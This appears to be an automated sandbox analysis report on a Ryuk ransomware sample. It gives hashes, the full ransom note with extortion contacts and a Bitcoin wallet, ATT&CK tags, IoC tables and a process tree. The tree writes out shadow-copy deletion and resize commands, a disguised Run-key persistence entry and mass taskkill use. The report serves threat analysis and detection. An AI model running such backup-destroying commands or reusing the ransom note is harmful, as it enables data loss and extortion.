ryuk | bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 11:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Size

79KB
MD5

6d7d0a07024e8e61ed94a14b96490f81
SHA1

a81ebdcfd566066d32d582a299fbbee946e4c310
SHA256

bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c
SHA512

781328a9fd68ed362c5fd538e9e99dd1db8d800cb01b36fb7f1c57b865f747b55b1ae6fb45107d5a5306e8926ad9f08abfbfd9eefb116ee0ad27f711efeac177
SSDEEP

1536:uBzyvLtPO7Pr90tG3yEJ0gJVlp8swKDsGULa5UUc6ahF98aaTpflFTTJovD:uB2+90tiV0EdJNaZ9wpfltTJ

Score

10^/10

ryuk defense_evasion discovery execution impact persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz Ryuk No system is safe

Emails

[email protected]

Wallets

1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Ryuk family
ryuk
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	DllHost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"	reg.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1840-0-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/1044-3-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/2288-16-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/1840-29120-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/1044-30805-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/1068-30888-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx
behavioral1/memory/2004-30904-0x000000013F5D0000-0x000000013F609000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXT	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736G.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL110.XML	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG	Dwm.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts.css	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar	DllHost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Chita	taskhost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0186002.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF	Dwm.exe
File opened for modification	C:\Program Files\Internet Explorer\it-IT\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\DELIMR.FAE	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14528_.GIF	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_COL.HXT	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_mid.gif	DllHost.exe
File opened for modification	C:\Program Files\Java\jre7\release	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\jaccess.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21302_.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14845_.GIF	Dwm.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-back-static.png	taskhost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar	DllHost.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB02229_.GIF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\ij	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Verve.eftx	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\fr-FR\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKS.ICO	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV11.POC	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\DATES.XML	DllHost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 42 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
26724	vssadmin.exe
7508	vssadmin.exe
30472	vssadmin.exe
22172	vssadmin.exe
25288	vssadmin.exe
5208	vssadmin.exe
26660	vssadmin.exe
8840	vssadmin.exe
2824	vssadmin.exe
10572	vssadmin.exe
26036	vssadmin.exe
30344	vssadmin.exe
10416	vssadmin.exe
30408	vssadmin.exe
9788	vssadmin.exe
10684	vssadmin.exe
27908	vssadmin.exe
3804	vssadmin.exe
26004	vssadmin.exe
11352	vssadmin.exe
25320	vssadmin.exe
30616	vssadmin.exe
30448	vssadmin.exe
8976	vssadmin.exe
22632	vssadmin.exe
25928	vssadmin.exe
27740	vssadmin.exe
30560	vssadmin.exe
27964	vssadmin.exe
27852	vssadmin.exe
10108	vssadmin.exe
9960	vssadmin.exe
10064	vssadmin.exe
22544	vssadmin.exe
27796	vssadmin.exe
10648	vssadmin.exe
30656	vssadmin.exe
30968	vssadmin.exe
34196	vssadmin.exe
2952	vssadmin.exe
26716	vssadmin.exe
27684	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
2864	taskkill.exe
2348	taskkill.exe
3584	taskkill.exe
2768	taskkill.exe
2692	taskkill.exe
1672	taskkill.exe
1680	taskkill.exe
1288	taskkill.exe
3388	taskkill.exe
3456	taskkill.exe
3512	taskkill.exe
2588	taskkill.exe
1180	taskkill.exe
3544	taskkill.exe
2288	taskkill.exe
1280	taskkill.exe
2012	taskkill.exe
2160	taskkill.exe
1560	taskkill.exe
3044	taskkill.exe
1612	taskkill.exe
1232	taskkill.exe
2648	taskkill.exe
960	taskkill.exe
3628	taskkill.exe
2608	taskkill.exe
3048	taskkill.exe
3304	taskkill.exe
3436	taskkill.exe
3664	taskkill.exe
2236	taskkill.exe
1980	taskkill.exe
2580	taskkill.exe
2936	taskkill.exe
3220	taskkill.exe
2116	taskkill.exe
2108	taskkill.exe
2844	taskkill.exe
3016	taskkill.exe
2620	taskkill.exe
2200	taskkill.exe
3356	taskkill.exe
2640	taskkill.exe
828	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	1232	taskkill.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	3016	taskkill.exe
Token: SeDebugPrivilege	2844	taskkill.exe
Token: SeDebugPrivilege	2580	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeDebugPrivilege	1280	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	3304	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	3388	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	3436	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3512	taskkill.exe
Token: SeDebugPrivilege	3628	taskkill.exe
Token: SeDebugPrivilege	3664	taskkill.exe
Token: SeDebugPrivilege	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Token: SeBackupPrivilege	34248	vssvc.exe
Token: SeRestorePrivilege	34248	vssvc.exe
Token: SeAuditPrivilege	34248	vssvc.exe

Suspicious use of UnmapMainImage 3 IoCs

pid	Process
1044	Dwm.exe
1068	taskhost.exe
2004	DllHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 2288	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 1840 wrote to memory of 2288	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 1840 wrote to memory of 2288	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 1840 wrote to memory of 2116	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 1840 wrote to memory of 2116	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 1840 wrote to memory of 2116	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 1840 wrote to memory of 1612	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 1840 wrote to memory of 1612	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 1840 wrote to memory of 1612	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 1840 wrote to memory of 2108	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 1840 wrote to memory of 2108	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 1840 wrote to memory of 2108	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 1840 wrote to memory of 2236	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	38
PID 1840 wrote to memory of 2236	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	38
PID 1840 wrote to memory of 2236	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	38
PID 1840 wrote to memory of 2640	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 1840 wrote to memory of 2640	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 1840 wrote to memory of 2640	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 1840 wrote to memory of 2768	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	41
PID 1840 wrote to memory of 2768	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	41
PID 1840 wrote to memory of 2768	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	41
PID 1840 wrote to memory of 1232	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 1840 wrote to memory of 1232	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 1840 wrote to memory of 1232	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 1840 wrote to memory of 2864	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	46
PID 1840 wrote to memory of 2864	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	46
PID 1840 wrote to memory of 2864	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	46
PID 1840 wrote to memory of 2692	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	47
PID 1840 wrote to memory of 2692	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	47
PID 1840 wrote to memory of 2692	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	47
PID 1840 wrote to memory of 2588	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	51
PID 1840 wrote to memory of 2588	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	51
PID 1840 wrote to memory of 2588	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	51
PID 1840 wrote to memory of 828	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 1840 wrote to memory of 828	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 1840 wrote to memory of 828	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 1840 wrote to memory of 1180	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 1840 wrote to memory of 1180	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 1840 wrote to memory of 1180	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 1840 wrote to memory of 2348	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 1840 wrote to memory of 2348	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 1840 wrote to memory of 2348	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 1840 wrote to memory of 1980	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 1840 wrote to memory of 1980	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 1840 wrote to memory of 1980	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 1840 wrote to memory of 1672	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 1840 wrote to memory of 1672	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 1840 wrote to memory of 1672	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 1840 wrote to memory of 1680	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 1840 wrote to memory of 1680	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 1840 wrote to memory of 1680	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 1840 wrote to memory of 2012	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 1840 wrote to memory of 2012	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 1840 wrote to memory of 2012	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 1840 wrote to memory of 2844	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	66
PID 1840 wrote to memory of 2844	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	66
PID 1840 wrote to memory of 2844	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	66
PID 1840 wrote to memory of 3016	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 1840 wrote to memory of 3016	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 1840 wrote to memory of 3016	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 1840 wrote to memory of 2580	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 1840 wrote to memory of 2580	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 1840 wrote to memory of 2580	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 1840 wrote to memory of 2160	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	73

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:33956
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:34196
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2824
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:9788
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:9960
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:10064
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:10572
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:10684
- - C:\Windows\system32\vssadmin.exe
